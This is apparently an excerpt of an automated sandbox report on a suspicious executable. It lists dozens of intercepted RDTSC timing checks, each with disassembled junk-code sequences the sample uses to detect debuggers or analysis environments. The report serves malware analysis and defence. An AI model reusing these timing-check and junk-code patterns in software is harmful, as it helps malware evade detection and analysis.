                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83AFCF second address: 83AFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAF7CBD5D36h 0x0000000a pop ecx 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAF7CBD5D43h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83AFF5 second address: 83AFF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83B45E second address: 83B464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83B464 second address: 83B46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83B46A second address: 83B477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83B477 second address: 83B487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7C6A41ACh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83B487 second address: 83B4BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF7CBD5D36h 0x00000008 jmp 00007FAF7CBD5D3Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAF7CBD5D49h 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83B4BE second address: 83B4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83B4C3 second address: 83B4C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83E85F second address: 83E868 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83EDAD second address: 83EDB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83EEEC second address: 83EF0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FAF7C6A41B0h 0x0000000f push esi 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83F07F second address: 83F09F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FAF7CBD5D36h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83F09F second address: 83F0C0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF7C6A41A6h 0x00000008 jmp 00007FAF7C6A41B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8465F6 second address: 846605 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844732 second address: 844736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844736 second address: 844744 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844744 second address: 844748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844BE4 second address: 844BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844BF4 second address: 844BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844BF9 second address: 844C03 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844C03 second address: 844C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B2h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844C19 second address: 844C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844C26 second address: 844C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844C2A second address: 844C30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844F3B second address: 844F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844F3F second address: 844F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 844F43 second address: 844F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 84553F second address: 845543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 845543 second address: 845549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 845549 second address: 84554F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 845B05 second address: 845B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAF7C6A41ABh 0x00000010 push esi 0x00000011 jmp 00007FAF7C6A41ACh 0x00000016 pop esi 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 845B29 second address: 845B2E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 845DC5 second address: 845DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 845DD2 second address: 845DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 84BA94 second address: 84BA9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 84BA9A second address: 84BAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 84BAA0 second address: 84BAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 84BE88 second address: 84BE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 84BE8C second address: 84BEA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FAF7C6A41B2h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 84BEA8 second address: 84BEAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 84BFFA second address: 84C03D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FAF7C6A41C2h 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FAF7C6A41ACh 0x00000019 jc 00007FAF7C6A41A8h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 84C03D second address: 84C055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D43h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 84C1BC second address: 84C1D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FAF7C6A41A6h 0x0000000b jng 00007FAF7C6A41A6h 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 850AEF second address: 850AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 850AF3 second address: 850B13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FAF7C6A41A6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 850B13 second address: 850B24 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 85827D second address: 858281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 858281 second address: 8582A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D48h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FAF7CBD5D50h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 856397 second address: 85639B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8564EF second address: 856506 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 856506 second address: 856512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FAF7C6A41A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 856512 second address: 856546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007FAF7CBD5D36h 0x0000000b jmp 00007FAF7CBD5D47h 0x00000010 popad 0x00000011 push esi 0x00000012 jnc 00007FAF7CBD5D36h 0x00000018 pop esi 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 856546 second address: 85654A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 85654A second address: 856558 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FAF7CBD5D36h 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 856949 second address: 856967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FAF7C6A41B9h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 856967 second address: 856981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 856AC2 second address: 856AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 856AC6 second address: 856AF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FAF7CBD5D45h 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FAF7CBD5D3Ah 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 856C5E second address: 856C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 856C64 second address: 856C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8570B2 second address: 8570CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAF7C6A41AEh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 857A32 second address: 857A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 855F73 second address: 855F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 85A7BD second address: 85A7C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 85A7C1 second address: 85A7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 85A7CD second address: 85A7D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 85A7D3 second address: 85A7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 85BF85 second address: 85BF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 85ED60 second address: 85ED7A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FAF7C6A41AAh 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 85ED7A second address: 85ED90 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FAF7CBD5D46h 0x0000000d pushad 0x0000000e jc 00007FAF7CBD5D36h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 864F5A second address: 864F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7C6A41AFh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 864F6D second address: 864F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8649C7 second address: 8649CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8649CB second address: 8649E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D3Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 873B4E second address: 873B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41ADh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FAF7C6A41B3h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 pop esi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 87C269 second address: 87C271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 87C271 second address: 87C2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B1h 0x00000009 jp 00007FAF7C6A41A6h 0x0000000f popad 0x00000010 popad 0x00000011 jc 00007FAF7C6A41D8h 0x00000017 jmp 00007FAF7C6A41ADh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FAF7C6A41B3h 0x00000023 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 87C2B6 second address: 87C2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 87C2BA second address: 87C2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 87E77D second address: 87E781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 887335 second address: 88734C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B0h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 88734C second address: 88736B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jng 00007FAF7CBD5D4Bh 0x0000000e jmp 00007FAF7CBD5D3Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8871E0 second address: 8871EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FAF7C6A41A6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8871EC second address: 8871FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FAF7CBD5D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 88E2E6 second address: 88E2F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAF7C6A41A6h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 88CCB2 second address: 88CCB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 88CCB6 second address: 88CCBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 88CCBA second address: 88CCC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
